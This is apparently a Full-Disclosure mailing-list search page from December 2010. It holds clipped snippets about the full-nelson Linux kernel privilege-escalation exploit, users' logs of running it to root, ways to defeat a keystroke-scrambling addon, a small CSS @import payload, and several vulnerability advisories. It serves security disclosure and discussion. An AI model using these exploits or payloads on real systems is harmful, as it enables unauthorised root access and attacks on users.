it's worked on 2.6.35.7, nice exploit
On Wed, Dec 8, 2010 at 6:09 AM, Rem7ter rem7...@gmail.com wrote:
Why gcc exp.c -o exp alert Error: too many Argument? I test it in Linux
2.6.X.
2010/12/7 coderman coder...@gmail.com
On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
interesting analysis of 'this thing called Protected Mode '
On Tue, Dec 07, 2010 at 02:51:08PM -0600, Marsh Ray wrote:
On 12/07/2010 07:12 AM, valdis.kletni...@vt.edu wrote:
On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said:
2. some interpret it as a feature and some as a bug?
Does it
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi list,
Is anyone familiar with the firefox addon KeyScrambler? According to developers
this encrypts keystrokes.
Quote:
How KeyScrambler Works:
When you type on your keyboard, the keys travel along a path within the
operating system before it
Won't work against a hardware keylogger, as it gets the strokes before the
driver does.
Won't work against any software aware of it; thread inject into Firefox to get
the real keystrokes and it's game over. Or heck, simply pretend to be a
firefox process to get the decryption key, assuming
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On 08/12/2010 11:36, Dan Kaminsky wrote:
Won't work against a hardware keylogger, as it gets the strokes before the
driver does.
I guessed that, although on occasions I do miss the obvious.
Won't work against any software aware of it; thread
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi
This seems to contradict itself somewhat. A plugin to firefox should
have no way to encrypt things at a driver level within the kernel, that
would require installing seperate software at the root level, a plugin
should not be able to do this and i
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi list,
Is anyone familiar with the firefox addon KeyScrambler? According to
developers this encrypts keystrokes.
What if the attacker uses a firefox plugin such as ffsnif[1] to get user's
credential ?
As Dan said, I guess this plugin will
Doesnt work here on Ubuntu 10.10 (VirtualBox) clean install (but with
all updates) with only an “apt-get install build-essential”
k...@kuri-virtualbox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION=Ubuntu 10.10
PR10-05: XSS injection vulnerability within HP System Management Homepage
(Formally Insight Manager)
Vulnerability found: 8th February 2010
Vendor informed: 9th February 2010
Vulnerability fixed: 6th August 2010
Severity: Medium
Description:
An XSS vulnerability has been found within HP system
Anyone tested this in sandbox yet?
00:37 linups:../expl/kernel cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel ./test
[*] Failed to open file
Failed on Ubuntu 10.10 (2.6.35-23-generic)
t...@bifrost:/tmp$ uname -a
Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
2010 x86_64 GNU/Linux
t...@bifrost:/tmp$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa03d9610
[+] Resolved
code
div style=position: absolute; top: -999px;left: -999px;
link href=css.css rel=stylesheet type=text/css /
/code
code of css.css
*{
color:red;
}
@import url(css.css);
@import url(css.css);
@import url(css.css);
@import url(css.css);
/code
http://www.wooyun.org/bugs/wooyun-2010-0885
WooYun
Software: RomPager/4.07 UPnP/1.0
Issue: A reboot can be caused when a special crafted http request is sent.
Other Details: This version of RomPager is seen on a number of
residential routers that are shipped by a number of different ISP's.
The router I personal know it effects is the d-link
If you've applied all your Ubuntu updates, the exploit is not going to
work. I decided to take a more responsible approach to exploit
publishing with this release. Rather than publish a fully weaponized
exploit that could be used by script kiddies everywhere to compromise
innocent users'
Failed on Ubuntu 10.10 (2.6.35-23-generic)
t...@bifrost:/tmp$ uname -a
Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
2010 x86_64 GNU/Linux
t...@bifrost:/tmp$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa03d9610
[+] Resolved
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
Anyone tested this in sandbox yet?
00:37 linups:../expl/kernel cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel gcc _2.6.37.local.c -o
It works for me with the default install on Ubuntu 10.10 kernel
2.6.35-22-generic once you run the updates it changes to 2.6.35-23 and then it
fails.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup
-Original Message-
From: Guillaume Friloux
I ran it and my computer turned into a mudkip. I took a picture which
I have uploaded at [0]
I didn't read the instructions was I supposed to?
[0] -
http://www.aspectofthehare.net/wp-content/uploads/2009/07/MudkipComputerGame.png
___
Full-Disclosure
==
Secunia Research 08/12/2010
- QuickTime Track Dimensions Buffer Overflow Vulnerability -
==
Table of Contents
Affected
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Hello Dan, is this exploitation not mitigated by best practice
defense-in-depth strategies such as
Debian lenny:
nik...@sandbox:~$ uname -a
Linux sandbox 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010
x86_64 GNU/Linux
nik...@sandbox:~$ make full-nelson
cc full-nelson.c -o full-nelson
nik...@sandbox:~$ ./full-nelson
[*] Resolving kernel addresses...
[+] Resolved
Works in kernel 2.6.32-24
Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19
01:38:40 UTC 2010 x86_64 GNU/Linux
ind...@indzin-desktop:~$ ./nels
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa0239510
[+] Resolved econet_ops to 0xa0239600
[+]
working here aswell
ownst...@local[~]$ uname -a
FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
ownst...@local[~]$ ./w00tw00t
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to
Google has acknowledged information about fixed versions of Website Optimizer
control scripts.
A potential XSS was reported by unnamed person.
More details at
http://websiteoptimizer.blogspot.com/2010/12/update-your-website-optimizer-scripts.html
including link to Help Center page with update
:~$ gcc nel.c
:~$ ./a.out
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf9c47280
[+] Resolved econet_ops to 0xf9c47360
[+] Resolved commit_creds to 0xc01625a0
[+] Resolved prepare_kernel_cred to 0xc01627a0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
#
Failed on Ubuntu 10.10
uname -a;
Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC
2010 i686 GNU/Linux
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0858340
[+] Resolved econet_ops to 0xe0858440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved
On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears rdse...@mtu.edu wrote:
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
2.6.35-22-generic). Works as expected.
Great job Dan. You're full of win!
Except that he needs to clean up his code - no one uses go to anymore.
Worked on Ubuntu 10.10 .. awesome work :)
On Thu, Dec 9, 2010 at 11:15 AM, Ed Carp e...@pobox.com wrote:
On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears rdse...@mtu.edu wrote:
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel
2.6.35-22-generic). Works as expected.
Great
28 matches
Mail list logo